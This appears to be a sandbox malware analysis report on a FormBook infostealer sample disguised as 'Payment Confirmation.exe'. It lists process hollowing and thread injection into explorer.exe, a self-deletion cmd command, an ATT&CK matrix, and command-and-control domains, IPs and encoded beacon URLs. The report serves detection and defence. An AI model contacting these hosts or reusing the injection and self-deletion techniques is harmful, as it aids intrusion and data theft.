          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04512990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04511DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04574257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04503A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04518E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04528EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04512ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045136CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045116E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04512AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045646A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04513B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04513B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044EDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044FFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0450F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0457FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044E4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045653CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045237F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045103E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0451B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04567794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045A138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0459D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_044F8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045B5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00409B50 LdrLoadDll,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10009B80 SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 52.206.159.80 80
          Source: C:\Windows\explorer.exeNetwork Connect: 45.91.80.182 80
          Source: C:\Windows\explorer.exeDomain query: www.thesewhitevvalls.com
          Source: C:\Windows\explorer.exeDomain query: www.lumberjackguitarloops.com
          Source: C:\Windows\explorer.exeDomain query: www.elliotpioneer.com
          Source: C:\Windows\explorer.exeDomain query: www.carts-amazon.com
          Source: C:\Windows\explorer.exeDomain query: www.chinaopedia.com
          Source: C:\Windows\explorer.exeNetwork Connect: 3.223.115.185 80
          Source: C:\Windows\explorer.exeDomain query: www.anadolu.academy
          Source: C:\Windows\explorer.exeDomain query: www.playstarexch.com
          Source: C:\Windows\explorer.exeNetwork Connect: 172.105.103.207 80
          Source: C:\Windows\explorer.exeNetwork Connect: 62.210.5.81 80
          Source: C:\Windows\explorer.exeDomain query: www.altitudebc.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 94.73.147.156 80
          Source: C:\Windows\explorer.exeDomain query: www.unasolucioendesa.com
          Source: C:\Windows\explorer.exeDomain query: www.atp-cayenne.com
          Source: C:\Windows\explorer.exeNetwork Connect: 82.98.134.154 80
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 9B0000
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Payment Confirmation.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeMemory written: C:\Users\user\Desktop\Payment Confirmation.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Payment Confirmation.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msiexec.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\Payment Confirmation.exeProcess created: C:\Users\user\Desktop\Payment Confirmation.exe 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Payment Confirmation.exe'
          Source: explorer.exe, 00000005.00000000.379906764.00000000083E9000.00000004.00000001.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.386546545.00000000008B8000.00000004.00000020.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.410368424.0000000000EE0000.00000002.00020000.sdmp, msiexec.exe, 0000000B.00000002.628076054.0000000002D60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_100098FF cpuid
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_10012E30 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 1_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.1.Payment Confirmation.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Payment Confirmation.exe.2320000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.420104693.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000001.366443083.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625496458.0000000000670000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437063971.00000000008E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.403569789.000000000DD52000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625316448.0000000000450000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.625629536.00000000006A0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.436642337.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.437002707.00000000008B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.366975255.0000000002320000.00000004.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1DLL Side-Loading1Process Injection612Virtualization/Sandbox Evasion2Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobApplication Shimming1DLL Side-Loading1Process Injection612LSASS MemorySecurity Software Discovery151Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Application Shimming1Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncSystem Information Discovery114Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 502129 Sample: Payment Confirmation.exe Startdate: 13/10/2021 Architecture: WINDOWS Score: 100 31 www.6233v.com 2->31 33 pflvcllbpf.hellomyai.com 2->33 35 2 other IPs or domains 2->35 43 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->43 45 Multi AV Scanner detection for domain / URL 2->45 47 Found malware configuration 2->47 49 9 other signatures 2->49 11 Payment Confirmation.exe 17 2->11         started        signatures3 process4 file5 29 C:\Users\user\AppData\Local\...\nawgsdqut.dll, PE32 11->29 dropped 59 Injects a PE file into a foreign processes 11->59 15 Payment Confirmation.exe 11->15         started        signatures6 process7 signatures8 61 Modifies the context of a thread in another process (thread injection) 15->61 63 Maps a DLL or memory area into another process 15->63 65 Sample uses process hollowing technique 15->65 67 Queues an APC in another process (thread injection) 15->67 18 explorer.exe 15->18 injected process9 dnsIp10 37 www.atp-cayenne.com 62.210.5.81, 49842, 80 OnlineSASFR France 18->37 39 www.thesewhitevvalls.com 172.105.103.207, 49810, 80 LINODE-APLinodeLLCUS United States 18->39 41 15 other IPs or domains 18->41 51 System process connects to network (likely due to code injection or exploit) 18->51 22 msiexec.exe 18->22         started        signatures11 process12 signatures13 53 Self deletion via cmd delete 22->53 55 Modifies the context of a thread in another process (thread injection) 22->55 57 Maps a DLL or memory area into another process 22->57 25 cmd.exe 1 22->25         started        process14 process15 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Payment Confirmation.exe24%VirustotalBrowse
          Payment Confirmation.exe20%ReversingLabsWin32.Backdoor.Androm
          Payment Confirmation.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsp1E48.tmp\nawgsdqut.dll3%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.Payment Confirmation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.0.Payment Confirmation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          4.0.Payment Confirmation.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          1.2.Payment Confirmation.exe.2320000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          11.2.msiexec.exe.49f796c.3.unpack100%AviraTR/Patched.Ren.GenDownload File
          4.2.Payment Confirmation.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.1.Payment Confirmation.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.thesewhitevvalls.com7%VirustotalBrowse
          chinaopedia.com4%VirustotalBrowse
          playstarexch.com4%VirustotalBrowse
          anadolu.academy1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.playstarexch.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=F+Gco1RpPHjV7dNAzyydjUzXzSLtfZhJDs/JobGsDdyJLAnfgLPEsB5vVRHdlMy1JFBV4EP6qw==0%Avira URL Cloudsafe
          http://www.chinaopedia.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=qdiIlJa1sa0FYbjdkssa7+Uw/DbrhXlci2BZlXFuRXTISdQByqYUnROnYc602mbs2qASatieoQ==0%Avira URL Cloudsafe
          http://www.anadolu.academy/b2c0/?EN9pK2=oisE9+VmZgmAkkrchIKqNWGyfJvkxHxTzu9sANYqnymeIWLgjiN74zWNndmykH/eOqLqSG+txg==&nZR4=4hr8Pfz0%Avira URL Cloudsafe
          http://www.unasolucioendesa.com/b2c0/?EN9pK2=nxasyuVnQv2XAhCx9zKAxU4oBW67ilDivwaG6+ZxC2XBQxj4p4XVuU/9/EEmkzFjfVH8yNww+g==&nZR4=4hr8Pfz0%Avira URL Cloudsafe
          http://www.lumberjackguitarloops.com/b2c0/?nZR4=4hr8Pfz&EN9pK2=Evx8EsBGe658r9iJtrgJltnDGszJP9p4seEC1w1oB9OxckrwwA+TpfgbJDcWmrfnS5cDyGsxIQ==0%Avira URL Cloudsafe
